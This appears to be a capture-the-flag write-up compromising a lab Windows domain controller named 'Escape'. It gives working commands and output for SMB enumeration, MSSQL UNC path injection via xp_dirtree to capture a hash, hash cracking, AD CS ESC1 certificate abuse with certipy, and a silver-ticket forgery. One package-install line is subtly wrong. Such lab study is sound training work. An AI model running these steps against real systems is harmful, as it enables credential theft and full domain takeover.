Escape
Overview
A Windows machine created by Geiseric features techniques including:
Active Directory
MSSQL Server UNC Path Injection
Credentials Harvest
Misconfigured Certificate Templates
Silver Ticket Attack
Reconnaissance
Services Discovery
The port scanning result suggests that the target is a domain controller and we got an MSSQL server running on it.
Also, we may access the target remotely later via WinRM.
$ sudo nmap -n -p- -Pn -v -sS -T4 --min-rate 1000 10.129.140.112 -oN ports.nmap
...
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
...
RootDSE
We can use ldapsearch
to get the domain name sequel.htb
.
$ ldapsearch -H ldap://10.129.140.112 -b '' -s base -x
...
schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=sequel,DC=htb
namingContexts: CN=Configuration,DC=sequel,DC=htb
...
We can check the target's hostname dc.sequel.htb
with dig
.
$ dig @<target_ip> dc.sequel.htb
...
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;dc.sequel.htb. IN A
;; ANSWER SECTION:
dc.sequel.htb. 1200 IN A 10.129.140.112
SMB
It seems that the SMB null session authentication is enabled on the target.
$ smbclient -N -L \\\\10.129.140.112\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We can further enumerate the share Public
using smbclient
and found a PDF file SQL Server Procedures.pdf
.
$ smbclient -N \\\\10.129.140.112\\Public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 11:51:25 2022
.. D 0 Sat Nov 19 11:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 13:39:43 2022
5184255 blocks of size 4096. 1446274 blocks available
SQL Server Procedures.pdf
We can learn a lot of information from the PDF file:
Domain name
sequel.htb
.The target company cloned the DC mockup to a dedicated mock SQL instance for the test.
Users can authenticate to the MSSQL server using Windows authentication on a domain-joined machine.
Users on a non-domain-joined machine need to use
cmdkey
before authenticate to the MSSQL.We can authenticate the MSSQL server with credential
PublicUser:GuestUserCantWrite1
using SQL Server Authentication.Some user names and emails including Ryan, Tom, Brandon, and
brandon.brown@sequel.htb
.
MSSQL
We can use Impacket-mssqlclient
, which uses SQL server authentication by default, to login to the MSSQL server now.
$ impacket-mssqlclient PublicUser:GuestUserCantWrite1@escape
The instance we are connecting to is DC\SQLMOCK
.
SQL> select @@servername;
----------
DC\SQLMOCK
Initial Access
UNC Path Injection
We can use the stored procedure xp_dirtree
to force the MSSQL server to authenticate to a SMB share we control.
We force the MSSQL server to authenticate with our SMB server.
SQL> EXEC xp_dirtree "\\<IP>\share"
subdirectory depth
------------ -----
We can then crack it using hashcat
with mode 5600 now and we get a credential SQL_SVC:REGGIE1234ronnie
.
$ hashcat -m 5600 --force mssql/hash.txt <path_to_rockyou>
...
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:ccaa3775661de1f13e604b4852ca1bb4:0101000000000000006614269f9ed901a11548007705bd96000000000100100062007a00430042004d00650050006f000300100062007a00430042004d00650050006f00020010006c0065005800420064006e0055005a00040010006c0065005800420064006e0055005a0007000800006614269f9ed90106000400020000000800300030000000000000000000000000300000ba7e14ae44c472a55ae9f2e3595120b049681885ea1cda180cb1ef3a3eef4d650a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320032000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SQL_SVC::sequel:aaaaaaaaaaaaaaaa:ccaa3775661de1f13e...000000
...
WinRM
We can access the target using evil-winrm
now.
$ evil-winrm -i <ip> -u sql_svc -p REGGIE1234ronnie
Discovery
LDAP Search
We can't use ldapsearch
directly because LDAP signing is enabled.
$ ldapsearch -D sql_svc@sequel.htb -x -b 'dc=sequel,dc=htb' -H ldap://escape -w REGGIE1234ronnie
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
User Ryan.Cooper
We found an MSSQL log file C:\SQLServer\Logs\ERRORLOG.BAK
.
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...
We see the user Ryan.Cooper
type his password incorrectly and we can try to login to the target using this password now.
$ evil-winrm -i escape -u ryan.cooper -p NuclearMosquito3
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
Group
We see that the user Ryan is a member of the group Certificate Service DCOM Access member of which can connect to certification authorities in the enterprise.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
...
It seems that we may abuse the AD CS to achieve domain escalation.
Privilege Escalation
Certified Pre-Owned
Offensive techniques including certificate stealing, persistence, and escalation techniques are outlined in the Certified Pre-Owned - Abusing Active Directory Certificate Services whitepaper.
See Certified Pre-Owned.
Technique ESC1
Users obtain certificates from CA through the certificate enrollment process. Some misconfiguration may result in domain escalation.
We can use the tool Certify.exe
to enumerate misconfigured certificate templates.
Or, we can use the Python package certipy
to enumerate from Linux.
And, we can find a vulnerable certificate template named UserAuthentication
:
$ python3 -m pip install certify-ad
$ certipy find -u 'ryan.cooper@sequel' -p 'NuclearMosquito3' -dc-ip 'escape' -vulnerable -stdout
...
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
...
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Certificate Signing Request
We can now use certipy
to request the certificate for the user administrator
now.
$certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Authentication
We can request the TGT ticket for the user administrator
using certificate now.
$ sudo ntpdate -u escape
$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
And, we can login to the target using evil-winrm
now.
$ evil-winrm -i escape -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Miscellaneous
Silver Ticket Attack
Since we got the password of the service account SQL_SVC
, we can mint a service-granting ticket for a non-existing SPN using the password hash as in a silver ticket attack.
First, we need the domain SID, in our case S-1-5-21-4078382237-1492182817-2568127209
:
$ evil-winrm -u sql_svc -i escape -p REGGIE1234ronnie
...
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
sequel\sql_svc S-1-5-21-4078382237-1492182817-2568127209-1106
...
We also need the NT-hash 1443ec19da4dac4ffc953bca1b57b4cf
:
from Cryptodome.Hash import MD4
from binascii import hexlify
password = 'REGGIE1234ronnie'
hash = MD4.new()
hash.update(password.encode('utf_16le'))
print(hexlify(hash.digest()).upper())
We can mint the TGS for the user Administrator
using Impacket's ticketer
with a non-existing SPN without touching the DC now.
$ impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip escape -spn MSSQL/DC.SEQUEL.HTB Administrator
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
We can now login the MSSQL service using the account administrator
now.
$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -k dc.sequel.htb
...
SQL> select suser_name()
--------------------
sequel\Administrator
Last updated